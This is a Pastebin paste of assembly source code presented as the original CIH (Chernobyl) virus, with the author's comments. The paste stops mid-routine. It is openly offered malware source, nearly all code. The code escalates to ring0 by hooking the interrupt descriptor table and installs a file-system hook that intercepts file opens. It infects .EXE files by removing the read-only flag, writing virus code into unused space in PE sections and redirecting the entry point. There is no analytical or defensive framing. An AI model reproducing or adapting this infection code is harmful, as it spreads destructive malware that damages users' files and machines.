FlyFar

Original Sourcecode Of The Chernobyl Virus (CIH)

Oct 21st, 2021
225
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. OriginalAppEXE SEGMENT
  2.  
  3. FileHeader:
  4. db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
  5. db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
  6. db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  7. db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  8. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  9. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  10. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  11. db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
  12. db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
  13. db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
  14. db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
  15. db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
  16. db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
  17. db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
  18. db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
  19. db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  20. db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
  21. db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
  22. db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
  23. db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
  24. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  25. db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  26. db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
  27. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  28. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  29. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  30. db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
  31. db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
  32. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  33. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  34. db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
  35. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  36. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  37. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  38. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  39. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  40. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  41. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  42. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  43. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  44. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  45. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  46. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  47. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  48. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  49. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  50. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  51. db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
  52. db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  53. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  54. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  55. db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
  56. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  57. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  58. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  59. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  60. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  61. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  62. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  63. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  64. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  65. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  66. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  67. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  68. db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  69. dd 00000000h, VirusSize
  70.  
  71. OriginalAppEXE ENDS
  72.  
  73. ; ****************************************************************************
  74. ; * My Virus Game *
  75. ; ****************************************************************************
  76.  
  77. ; *********************************************************
  78. ; * Constant Define *
  79. ; *********************************************************
  80.  
  81. TRUE = 1
  82. FALSE = 0
  83.  
  84. DEBUG = TRUE
  85.  
  86. MajorVirusVersion = 1
  87. MinorVirusVersion = 4
  88.  
  89. VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
  90.  
  91.  
  92. IF DEBUG
  93.  
  94. FirstKillHardDiskNumber = 81h
  95. HookExceptionNumber = 05h
  96.  
  97. ELSE
  98.  
  99. FirstKillHardDiskNumber = 80h
  100. HookExceptionNumber = 03h
  101.  
  102. ENDIF
  103.  
  104.  
  105. FileNameBufferSize = 7fh
  106.  
  107. ; *********************************************************
  108. ; *********************************************************
  109.  
  110. VirusGame SEGMENT
  111.  
  112. ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
  113. ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
  114.  
  115. ; *********************************************************
  116. ; * Ring3 Virus Game Initial Program *
  117. ; *********************************************************
  118.  
  119. MyVirusStart:
  120. push ebp
  121.  
  122. ; *************************************
  123. ; * Let's Modify Structured Exception *
  124. ; * Handing, Prevent Exception Error *
  125. ; * Occurrence, Especially in NT. *
  126. ; *************************************
  127.  
  128. lea eax, [esp-04h*2]
  129.  
  130. xor ebx, ebx
  131. xchg eax, fs:[ebx]
  132.  
  133. call @0
  134. @0:
  135. pop ebx
  136.  
  137. lea ecx, StopToRunVirusCode-@0[ebx]
  138. push ecx
  139.  
  140. push eax
  141.  
  142. ; *************************************
  143. ; * Let's Modify *
  144. ; * IDT(Interrupt Descriptor Table) *
  145. ; * to Get Ring0 Privilege... *
  146. ; *************************************
  147.  
  148. push eax ;
  149. sidt [esp-02h] ; Get IDT Base Address
  150. pop ebx ;
  151.  
  152. add ebx, HookExceptionNumber*08h+04h ; ZF = 0
  153.  
  154. cli
  155.  
  156. mov ebp, [ebx] ; Get Exception Base
  157. mov bp, [ebx-04h] ; Entry Point
  158.  
  159. lea esi, MyExceptionHook-@1[ecx]
  160.  
  161. push esi
  162.  
  163. mov [ebx-04h], si ;
  164. shr esi, 16 ; Modify Exception
  165. mov [ebx+02h], si ; Entry Point Address
  166.  
  167. pop esi
  168.  
  169. ; *************************************
  170. ; * Generate Exception to Get Ring0 *
  171. ; *************************************
  172.  
  173. int HookExceptionNumber ; GenerateException
  174. ReturnAddressOfEndException = $
  175.  
  176. ; *************************************
  177. ; * Merge All Virus Code Section *
  178. ; *************************************
  179.  
  180. push esi
  181. mov esi, eax
  182.  
  183. LoopOfMergeAllVirusCodeSection:
  184.  
  185. mov ecx, [eax-04h]
  186.  
  187. rep movsb
  188.  
  189. sub eax, 08h
  190.  
  191. mov esi, [eax]
  192.  
  193. or esi, esi
  194. jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
  195.  
  196. jmp LoopOfMergeAllVirusCodeSection
  197.  
  198. QuitLoopOfMergeAllVirusCodeSection:
  199.  
  200. pop esi
  201.  
  202. ; *************************************
  203. ; * Generate Exception Again *
  204. ; *************************************
  205.  
  206. int HookExceptionNumber ; GenerateException Again
  207.  
  208. ; *************************************
  209. ; * Let's Restore *
  210. ; * Structured Exception Handing *
  211. ; *************************************
  212.  
  213. ReadyRestoreSE:
  214. sti
  215.  
  216. xor ebx, ebx
  217.  
  218. jmp RestoreSE
  219.  
  220. ; *************************************
  221. ; * When Exception Error Occurs, *
  222. ; * Our OS System should be in NT. *
  223. ; * So My Cute Virus will not *
  224. ; * Continue to Run, it Jmups to *
  225. ; * Original Application to Run. *
  226. ; *************************************
  227.  
  228. StopToRunVirusCode:
  229. @1 = StopToRunVirusCode
  230.  
  231. xor ebx, ebx
  232. mov eax, fs:[ebx]
  233. mov esp, [eax]
  234.  
  235. RestoreSE:
  236. pop dword ptr fs:[ebx]
  237. pop eax
  238.  
  239. ; *************************************
  240. ; * Return Original App to Execute *
  241. ; *************************************
  242.  
  243. pop ebp
  244.  
  245. push 00401000h ; Push Original
  246. OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
  247.  
  248. ret ; Return to Original App Entry Point
  249.  
  250. ; *********************************************************
  251. ; * Ring0 Virus Game Initial Program *
  252. ; *********************************************************
  253.  
  254. MyExceptionHook:
  255. @2 = MyExceptionHook
  256.  
  257. jz InstallMyFileSystemApiHook
  258.  
  259. ; *************************************
  260. ; * Do My Virus Exist in System !? *
  261. ; *************************************
  262.  
  263. mov ecx, dr0
  264. jecxz AllocateSystemMemoryPage
  265.  
  266. add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
  267.  
  268. ; *************************************
  269. ; * Return to Ring3 Initial Program *
  270. ; *************************************
  271.  
  272. ExitRing0Init:
  273. mov [ebx-04h], bp ;
  274. shr ebp, 16 ; Restore Exception
  275. mov [ebx+02h], bp ;
  276.  
  277. iretd
  278.  
  279. ; *************************************
  280. ; * Allocate SystemMemory Page to Use *
  281. ; *************************************
  282.  
  283. AllocateSystemMemoryPage:
  284.  
  285. mov dr0, ebx ; Set the Mark of My Virus Exist in System
  286.  
  287. push 00000000fh ;
  288. push ecx ;
  289. push 0ffffffffh ;
  290. push ecx ;
  291. push ecx ;
  292. push ecx ;
  293. push 000000001h ;
  294. push 000000002h ;
  295. int 20h ; VMMCALL _PageAllocate
  296. _PageAllocate = $ ;
  297. dd 00010053h ; Use EAX, ECX, EDX, and flags
  298. add esp, 08h*04h
  299.  
  300. xchg edi, eax ; EDI = SystemMemory Start Address
  301.  
  302. lea eax, MyVirusStart-@2[esi]
  303.  
  304. iretd ; Return to Ring3 Initial Program
  305.  
  306. ; *************************************
  307. ; * Install My File System Api Hook *
  308. ; *************************************
  309.  
  310. InstallMyFileSystemApiHook:
  311.  
  312. lea eax, FileSystemApiHook-@6[edi]
  313.  
  314. push eax ;
  315. int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
  316. IFSMgr_InstallFileSystemApiHook = $ ;
  317. dd 00400067h ; Use EAX, ECX, EDX, and flags
  318.  
  319. mov dr0, eax ; Save OldFileSystemApiHook Address
  320.  
  321. pop eax ; EAX = FileSystemApiHook Address
  322.  
  323. ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
  324. mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
  325. mov edx, [ecx]
  326. mov OldInstallFileSystemApiHook-@3[eax], edx
  327.  
  328. ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
  329. lea eax, InstallFileSystemApiHook-@3[eax]
  330. mov [ecx], eax
  331.  
  332. cli
  333.  
  334. jmp ExitRing0Init
  335.  
  336. ; *********************************************************
  337. ; * Code Size of Merge Virus Code Section *
  338. ; *********************************************************
  339.  
  340. CodeSizeOfMergeVirusCodeSection = offset $
  341.  
  342. ; *********************************************************
  343. ; * IFSMgr_InstallFileSystemApiHook *
  344. ; *********************************************************
  345.  
  346. InstallFileSystemApiHook:
  347. push ebx
  348.  
  349. call @4 ;
  350. @4: ;
  351. pop ebx ; mov ebx, offset FileSystemApiHook
  352. add ebx, FileSystemApiHook-@4 ;
  353.  
  354. push ebx
  355. int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
  356. IFSMgr_RemoveFileSystemApiHook = $
  357. dd 00400068h ; Use EAX, ECX, EDX, and flags
  358. pop eax
  359.  
  360. ; Call Original IFSMgr_InstallFileSystemApiHook
  361. ; to Link Client FileSystemApiHook
  362. push dword ptr [esp+8]
  363. call OldInstallFileSystemApiHook-@3[ebx]
  364. pop ecx
  365.  
  366. push eax
  367.  
  368. ; Call Original IFSMgr_InstallFileSystemApiHook
  369. ; to Link My FileSystemApiHook
  370. push ebx
  371. call OldInstallFileSystemApiHook-@3[ebx]
  372. pop ecx
  373.  
  374. mov dr0, eax ; Adjust OldFileSystemApiHook Address
  375.  
  376. pop eax
  377.  
  378. pop ebx
  379.  
  380. ret
  381.  
  382. ; *********************************************************
  383. ; * Static Data *
  384. ; *********************************************************
  385.  
  386. OldInstallFileSystemApiHook dd ?
  387.  
  388. ; *********************************************************
  389. ; * IFSMgr_FileSystemHook *
  390. ; *********************************************************
  391.  
  392. ; *************************************
  393. ; * IFSMgr_FileSystemHook Entry Point *
  394. ; *************************************
  395.  
  396. FileSystemApiHook:
  397. @3 = FileSystemApiHook
  398.  
  399. pushad
  400.  
  401. call @5 ;
  402. @5: ;
  403. pop esi ; mov esi, offset VirusGameDataStartAddress
  404. add esi, VirusGameDataStartAddress-@5
  405.  
  406. ; *************************************
  407. ; * Is OnBusy !? *
  408. ; *************************************
  409.  
  410. test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
  411. jnz pIFSFunc ; goto pIFSFunc
  412.  
  413. ; *************************************
  414. ; * Is OpenFile !? *
  415. ; *************************************
  416.  
  417. ; if ( NotOpenFile )
  418. ; goto prevhook
  419. lea ebx, [esp+20h+04h+04h]
  420. cmp dword ptr [ebx], 00000024h
  421. jne prevhook
  422.  
  423. ; *************************************
  424. ; * Enable OnBusy *
  425. ; *************************************
  426.  
  427. inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
  428.  
  429. ; *************************************
  430. ; * Get FilePath's DriveNumber, *
  431. ; * then Set the DriveName to *
  432. ; * FileNameBuffer. *
  433. ; *************************************
  434. ; * Ex. If DriveNumber is 03h, *
  435. ; * DriveName is 'C:'. *
  436. ; *************************************
  437.  
  438. ; mov esi, offset FileNameBuffer
  439. add esi, FileNameBuffer-@6
  440.  
  441. push esi
  442.  
  443. mov al, [ebx+04h]
  444. cmp al, 0ffh
  445. je CallUniToBCSPath
  446.  
  447. add al, 40h
  448. mov ah, ':'
  449.  
  450. mov [esi], eax
  451.  
  452. inc esi
  453. inc esi
  454.  
  455. ; *************************************
  456. ; * UniToBCSPath *
  457. ; *************************************
  458. ; * This Service Converts *
  459. ; * a Canonicalized Unicode Pathname *
  460. ; * to a Normal Pathname in the *
  461. ; * Specified BCS Character Set. *
  462. ; *************************************
  463.  
  464. CallUniToBCSPath:
  465. push 00000000h
  466. push FileNameBufferSize
  467. mov ebx, [ebx+10h]
  468. mov eax, [ebx+0ch]
  469. add eax, 04h
  470. push eax
  471. push esi
  472. int 20h ; VXDCall UniToBCSPath
  473. UniToBCSPath = $
  474. dd 00400041h
  475. add esp, 04h*04h
  476.  
  477. ; *************************************
  478. ; * Is FileName '.EXE' !? *
  479. ; *************************************
  480.  
  481. ; cmp [esi+eax-04h], '.EXE'
  482. cmp [esi+eax-04h], 'EXE.'
  483. pop esi
  484. jne DisableOnBusy
  485.  
  486. IF DEBUG
  487.  
  488. ; *************************************
  489. ; * Only for Debug *
  490. ; *************************************
  491.  
  492. ; cmp [esi+eax-06h], 'FUCK'
  493. cmp [esi+eax-06h], 'KCUF'
  494. jne DisableOnBusy
  495.  
  496. ENDIF
  497.  
  498. ; *************************************
  499. ; * Is Open Existing File !? *
  500. ; *************************************
  501.  
  502. ; if ( NotOpenExistingFile )
  503. ; goto DisableOnBusy
  504. cmp word ptr [ebx+18h], 01h
  505. jne DisableOnBusy
  506.  
  507. ; *************************************
  508. ; * Get Attributes of the File *
  509. ; *************************************
  510.  
  511. mov ax, 4300h
  512. int 20h ; VXDCall IFSMgr_Ring0_FileIO
  513. IFSMgr_Ring0_FileIO = $
  514. dd 00400032h
  515.  
  516. jc DisableOnBusy
  517.  
  518. push ecx
  519.  
  520. ; *************************************
  521. ; * Get IFSMgr_Ring0_FileIO Address *
  522. ; *************************************
  523.  
  524. mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
  525. mov edi, [edi]
  526.  
  527. ; *************************************
  528. ; * Is Read-Only File !? *
  529. ; *************************************
  530.  
  531. test cl, 01h
  532. jz OpenFile
  533.  
  534. ; *************************************
  535. ; * Modify Read-Only File to Write *
  536. ; *************************************
  537.  
  538. mov ax, 4301h
  539. xor ecx, ecx
  540. call edi ; VXDCall IFSMgr_Ring0_FileIO
  541.  
  542. ; *************************************
  543. ; * Open File *
  544. ; *************************************
  545.  
  546. OpenFile:
  547. xor eax, eax
  548. mov ah, 0d5h
  549. xor ecx, ecx
  550. xor edx, edx
  551. inc edx
  552. mov ebx, edx
  553. inc ebx
  554. call edi ; VXDCall IFSMgr_Ring0_FileIO
  555.  
  556. xchg ebx, eax ; mov ebx, FileHandle
  557.  
  558. ; *************************************
  559. ; * Need to Restore *
  560. ; * Attributes of the File !? *
  561. ; *************************************
  562.  
  563. pop ecx
  564.  
  565. pushf
  566.  
  567. test cl, 01h
  568. jz IsOpenFileOK
  569.  
  570. ; *************************************
  571. ; * Restore Attributes of the File *
  572. ; *************************************
  573.  
  574. mov ax, 4301h
  575. call edi ; VXDCall IFSMgr_Ring0_FileIO
  576.  
  577. ; *************************************
  578. ; * Is Open File OK !? *
  579. ; *************************************
  580.  
  581. IsOpenFileOK:
  582. popf
  583.  
  584. jc DisableOnBusy
  585.  
  586. ; *************************************
  587. ; * Open File Already Succeed. ^__^ *
  588. ; *************************************
  589.  
  590. push esi ; Push FileNameBuffer Address to Stack
  591.  
  592. pushf ; Now CF = 0, Push Flag to Stack
  593.  
  594. add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
  595.  
  596. ; ***************************
  597. ; * Get OffsetToNewHeader *
  598. ; ***************************
  599.  
  600. xor eax, eax
  601. mov ah, 0d6h
  602.  
  603. ; For Doing Minimal VirusCode's Length,
  604. ; I Save EAX to EBP.
  605. mov ebp, eax
  606.  
  607. push 00000004h
  608. pop ecx
  609. push 0000003ch
  610. pop edx
  611. call edi ; VXDCall IFSMgr_Ring0_FileIO
  612.  
  613. mov edx, [esi]
  614.  
  615. ; ***************************
  616. ; * Get 'PE\0' Signature *
  617. ; * of ImageFileHeader, and *
  618. ; * Infected Mark. *
  619. ; ***************************
  620.  
  621. dec edx
  622.  
  623. mov eax, ebp
  624. call edi ; VXDCall IFSMgr_Ring0_FileIO
  625.  
  626. ; ***************************
  627. ; * Is PE !? *
  628. ; ***************************
  629. ; * Is the File *
  630. ; * Already Infected !? *
  631. ; ***************************
  632. ; * WinZip Self-Extractor *
  633. ; * doesn't Have Infected *
  634. ; * Mark Because My Virus *
  635. ; * doesn't Infect it. *
  636. ; ***************************
  637.  
  638. ; cmp [esi], '\0PE\0'
  639. cmp dword ptr [esi], 00455000h
  640. jne CloseFile
  641.  
  642. ; *************************************
  643. ; * The File is ^o^ *
  644. ; * PE(Portable Executable) indeed. *
  645. ; *************************************
  646. ; * The File isn't also Infected. *
  647. ; *************************************
  648.  
  649. ; *************************************
  650. ; * Start to Infect the File *
  651. ; *************************************
  652. ; * Registers Use Status Now : *
  653. ; * *
  654. ; * EAX = 04h *
  655. ; * EBX = File Handle *
  656. ; * ECX = 04h *
  657. ; * EDX = 'PE\0\0' Signature of *
  658. ; * ImageFileHeader Pointer's *
  659. ; * Former Byte. *
  660. ; * ESI = DataBuffer Address ==> @8 *
  661. ; * EDI = IFSMgr_Ring0_FileIO Address *
  662. ; * EBP = D600h ==> Read Data in File *
  663. ; *************************************
  664. ; * Stack Dump : *
  665. ; * *
  666. ; * ESP => ------------------------- *
  667. ; * | EFLAG(CF=0) | *
  668. ; * ------------------------- *
  669. ; * | FileNameBufferPointer | *
  670. ; * ------------------------- *
  671. ; * | EDI | *
  672. ; * ------------------------- *
  673. ; * | ESI | *
  674. ; * ------------------------- *
  675. ; * | EBP | *
  676. ; * ------------------------- *
  677. ; * | ESP | *
  678. ; * ------------------------- *
  679. ; * | EBX | *
  680. ; * ------------------------- *
  681. ; * | EDX | *
  682. ; * ------------------------- *
  683. ; * | ECX | *
  684. ; * ------------------------- *
  685. ; * | EAX | *
  686. ; * ------------------------- *
  687. ; * | Return Address | *
  688. ; * ------------------------- *
  689. ; *************************************
  690.  
  691. push ebx ; Save File Handle
  692.  
  693. push 00h ; Set VirusCodeSectionTableEndMark
  694.  
  695. ; ***************************
  696. ; * Let's Set the *
  697. ; * Virus' Infected Mark *
  698. ; ***************************
  699.  
  700. push 01h ; Size
  701. push edx ; Pointer of File
  702. push edi ; Address of Buffer
  703.  
  704. ; ***************************
  705. ; * Save ESP Register *
  706. ; ***************************
  707.  
  708. mov dr1, esp
  709.  
  710. ; ***************************
  711. ; * Let's Set the *
  712. ; * NewAddressOfEntryPoint *
  713. ; * ( Only First Set Size ) *
  714. ; ***************************
  715.  
  716. push eax ; Size
  717.  
  718. ; ***************************
  719. ; * Let's Read *
  720. ; * Image Header in File *
  721. ; ***************************
  722.  
  723. mov eax, ebp
  724. mov cl, SizeOfImageHeaderToRead
  725. add edx, 07h ; Move EDX to NumberOfSections
  726. call edi ; VXDCall IFSMgr_Ring0_FileIO
  727.  
  728. ; ***************************
  729. ; * Let's Set the *
  730. ; * NewAddressOfEntryPoint *
  731. ; * ( Set Pointer of File, *
  732. ; * Address of Buffer ) *
  733. ; ***************************
  734.  
  735. lea eax, (AddressOfEntryPoint-@8)[edx]
  736. push eax ; Pointer of File
  737.  
  738. lea eax, (NewAddressOfEntryPoint-@8)[esi]
  739. push eax ; Address of Buffer
  740.  
  741. ; ***************************
  742. ; * Move EDX to the Start *
  743. ; * of SectionTable in File *
  744. ; ***************************
  745.  
  746. movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
  747. lea edx, [eax+edx+12h]
  748.  
  749. ; ***************************
  750. ; * Let's Get *
  751. ; * Total Size of Sections *
  752. ; ***************************
  753.  
  754. mov al, SizeOfScetionTable
  755.  
  756. ; I Assume NumberOfSections <= 0ffh
  757. mov cl, (NumberOfSections-@8)[esi]
  758.  
  759. mul cl
  760.  
  761. ; ***************************
  762. ; * Let's Set Section Table *
  763. ; ***************************
  764.  
  765. ; Move ESI to the Start of SectionTable
  766. lea esi, (StartOfSectionTable-@8)[esi]
  767.  
  768. push eax ; Size
  769. push edx ; Pointer of File
  770. push esi ; Address of Buffer
  771.  
  772. ; ***************************
  773. ; * The Code Size of Merge *
  774. ; * Virus Code Section and *
  775. ; * Total Size of Virus *
  776. ; * Code Section Table Must *
  777. ; * be Small or Equal the *
  778. ; * Unused Space Size of *
  779. ; * Following Section Table *
  780. ; ***************************
  781.  
  782. inc ecx
  783. push ecx ; Save NumberOfSections+1
  784.  
  785. shl ecx, 03h
  786. push ecx ; Save TotalSizeOfVirusCodeSectionTable
  787.  
  788. add ecx, eax
  789. add ecx, edx
  790.  
  791. sub ecx, (SizeOfHeaders-@9)[esi]
  792. not ecx
  793. inc ecx
  794.  
  795. ; Save My Virus First Section Code
  796. ; Size of Following Section Table...
  797. ; ( Not Include the Size of Virus Code Section Table )
  798. push ecx
  799.  
  800. xchg ecx, eax ; ECX = Size of Section Table
  801.  
  802. ; Save Original Address of Entry Point
  803. mov eax, (AddressOfEntryPoint-@9)[esi]
  804. add eax, (ImageBase-@9)[esi]
  805. mov (OriginalAddressOfEntryPoint-@9)[esi], eax
  806.  
  807. cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
  808. jl OnlySetInfectedMark
  809.  
  810. ; ***************************
  811. ; * Read All Section Tables *
  812. ; ***************************
  813.  
  814. mov eax, ebp
  815. call edi ; VXDCall IFSMgr_Ring0_FileIO
  816.  
  817. ; ***************************
  818. ; * Full Modify the Bug : *
  819. ; * WinZip Self-Extractor *
  820. ; * Occurs Error... *
  821. ; ***************************
  822. ; * So When User Opens *
  823. ; * WinZip Self-Extractor, *
  824. ; * Virus Doesn't Infect it.*
  825. ; ***************************
  826. ; * First, Virus Gets the *
  827. ; * PointerToRawData in the *
  828. ; * Second Section Table, *
  829. ; * Reads the Section Data, *
  830. ; * and Tests the String of *
  831. ; * 'WinZip(R)'...... *
  832. ; ***************************
  833.  
  834. xchg eax, ebp
  835.  
  836. push 00000004h
  837. pop ecx
  838.  
  839. push edx
  840. mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
  841. add edx, 12h
  842.  
  843. call edi ; VXDCall IFSMgr_Ring0_FileIO
  844.  
  845. ; cmp [esi], 'nZip'
  846. cmp dword ptr [esi], 'piZn'
  847. je NotSetInfectedMark
  848.  
  849. pop edx
  850.  
  851. ; ***************************
  852. ; * Let's Set Total Virus *
  853. ; * Code Section Table *
  854. ; ***************************
  855.  
  856. ; EBX = My Virus First Section Code
  857. ; Size of Following Section Table
  858. pop ebx
  859. pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
  860. pop ecx ; ECX = NumberOfSections+1
  861.  
  862. push edi ; Size
  863.  
  864. add edx, ebp
  865. push edx ; Pointer of File
  866.  
  867. add ebp, esi
  868. push ebp ; Address of Buffer
  869.  
  870. ; ***************************
  871. ; * Set the First Virus *
  872. ; * Code Section Size in *
  873. ; * VirusCodeSectionTable *
  874. ; ***************************
  875.  
  876. lea eax, [ebp+edi-04h]
  877. mov [eax], ebx
  878.  
  879. ; ***************************
  880. ; * Let's Set My Virus *
  881. ; * First Section Code *
  882. ; ***************************
  883.  
  884. push ebx ; Size
  885.  
  886. add edx, edi
  887. push edx ; Pointer of File
  888.  
  889. lea edi, (MyVirusStart-@9)[esi]
  890. push edi ; Address of Buffer
  891.  
  892. ; ***************************
  893. ; * Let's Modify the *
  894. ; * AddressOfEntryPoint to *
  895. ; * My Virus Entry Point *
  896. ; ***************************
  897.  
  898. mov (NewAddressOfEntryPoint-@9)[esi], edx
  899.  
  900. ; ***************************
  901. ; * Setup Initial Data *
  902. ; ***************************
  903.  
  904. lea edx, [esi-SizeOfScetionTable]
  905. mov ebp, offset VirusSize
  906.  
  907. jmp StartToWriteCodeToSections
  908.  
  909. ; ***************************
  910. ; * Write Code to Sections *
  911. ; ***************************
  912.  
  913. LoopOfWriteCodeToSections:
  914.  
  915. add edx, SizeOfScetionTable
  916.  
  917. mov ebx, (SizeOfRawData-@9)[edx]
  918. sub ebx, (VirtualSize-@9)[edx]
  919. jbe EndOfWriteCodeToSections
  920.  
  921. push ebx ; Size
  922.  
  923. sub eax, 08h
  924. mov [eax], ebx
  925.  
  926. mov ebx, (PointerToRawData-@9)[edx]
  927. add ebx, (VirtualSize-@9)[edx]
  928. push ebx ; Pointer of File
  929.  
  930. push edi ; Address of Buffer
  931.  
  932. mov ebx, (VirtualSize-@9)[edx]
  933. add ebx, (VirtualAddress-@9)[edx]
  934. add ebx, (ImageBase-@9)[esi]
  935. mov [eax+4], ebx
  936.  
  937. mov ebx, [eax]
  938. add (VirtualSize-@9)[edx], ebx
  939.  
  940. ; Section contains initialized data ==> 00000040h
  941. ; Section can be Read. ==> 40000000h
  942. or (Characteristics-@9)[edx], 40000040h
  943.  
  944. StartToWriteCodeToSections:
  945.  
  946. sub ebp, ebx
  947. jbe SetVirusCodeSectionTableEndMark
  948.  
  949. add edi, ebx ; Move Address of Buffer
  950.  
  951. EndOfWriteCodeToSections:
  952.  
  953. loop LoopOfWriteCodeToSections
  954.  
  955. ; ***************************
  956. ; * Only Set Infected Mark *
  957. ; ***************************
  958.  
  959. OnlySetInfectedMark:
  960. mov esp, dr1
  961.  
  962. jmp WriteVirusCodeToFile
  963.  
  964. ; ***************************
  965. ; * Not Set Infected Mark *
  966. ; ***************************
  967.  
  968. NotSetInfectedMark:
  969. add esp, 3ch
  970.  
  971. jmp CloseFile
  972.  
  973. ; ***************************
  974. ; * Set Virus Code *
  975. ; * Section Table End Mark *
  976. ; ***************************
  977.  
  978. SetVirusCodeSectionTableEndMark:
  979.  
  980. ; Adjust Size of Virus Section Code to Correct Value
  981. add [eax], ebp
  982. add [esp+08h], ebp
  983.  
  984. ; Set End Mark
  985. xor ebx, ebx
  986. mov [eax-04h], ebx
  987.  
  988. ; ***************************
  989. ; * When VirusGame Calls *
  990. ; * VxDCall, VMM Modifies *
  991. ; * the 'int 20h' and the *
  992. ; * 'Service Identifier' *
  993. ; * to 'Call [XXXXXXXX]'. *
  994. ; ***************************
  995. ; * Before Writing My Virus *
  996. ; * to File, I Must Restore *
  997. ; * them First. ^__^ *
  998. ; ***************************
  999.  
  1000. lea eax, (LastVxDCallAddress-2-@9)[esi]
  1001.  
  1002. mov cl, VxDCallTableSize
  1003.  
  1004. LoopOfRestoreVxDCallID:
  1005. mov word ptr [eax], 20cdh
  1006.  
  1007. mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
  1008. mov [eax+2], edx
  1009.  
  1010. movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
  1011. sub eax, edx
  1012.  
  1013. loop LoopOfRestoreVxDCallID
  1014.  
  1015. ; ***************************
  1016. ; * Let's Write *
  1017. ; * Virus Code to the File *
  1018. ; ***************************
  1019.  
  1020. WriteVirusCodeToFile:
  1021. mov eax, dr1
  1022. mov ebx, [eax+10h]
  1023. mov edi, [eax]
  1024.  
